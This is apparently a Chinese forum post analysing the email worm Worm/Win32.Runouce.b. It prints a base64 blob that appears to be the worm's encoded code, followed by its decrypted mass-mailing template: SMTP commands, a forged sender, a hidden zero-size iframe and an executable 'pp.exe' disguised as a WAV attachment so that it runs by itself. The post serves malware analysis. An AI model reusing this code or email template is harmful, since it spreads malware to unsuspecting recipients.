CLXQiB7AABAACL/OgIAAAAUnVub25jZQBeaAABAADoBAAAAOb1bnlYVFdqAGoAVlP/EFjoBAAAALj/bnlYagBqAGoEagBT/xDoBAAAAEHobnlYaAABAABXagFqAFZT/xDr0enIAAAA6AQAAACtaeh3WP91CGoAaP8PHwD/EAvAdCyL2OgEAAAAALTmd1hq/1P/EOgAAAAAWYPBGpCQkOgEAAAAKnXod1hqAVH/EMnCBADpyAAAAGBQDwFMJP5Yg8AYixiLUAToCwAAAGCJGIlQBPzzpGHP+maPAGaPQAaLdQiLfQyLTRDM+2HJwgwA6cgAAABgi0UIagBQUGoA/5aQAAAAYcnCBAAAAAAAAAAAAMMAAAAAAAAAAAAAAAAAAAA=

经解密得到数据:
HELO btamail.net.cn
MAIL FROM: imissyou@btamail.net.cn
RCPT TO:
DATA
FROM: A-738DF22C9CA04@yahoo.com
TO:
SUBJECT: A-738DF22C9CA04 is comming!
MIME-Version: 1.0
Content-type: multipart/mixed; boundary="#BOUNDARY#"

--#BOUNDARY#
Content-Type: text/html
Content-Transfer-Encoding: quoted-printable

<html><HEAD></HEAD><body bgColor=3D#ffffff><iframe src=3Dcid:THE-CID height=3D0 width=3D0></iframe></body></html>

--#BOUNDARY#
MIME-Version: 1.0
Content-Type: audio/x-wav; name="pp.exe"
Content-Transfer-Encoding: base64
Content-id: THE-CID

MZP   
页: [1]
查看完整版本: Worm/Win32.Runouce.b[Email]分析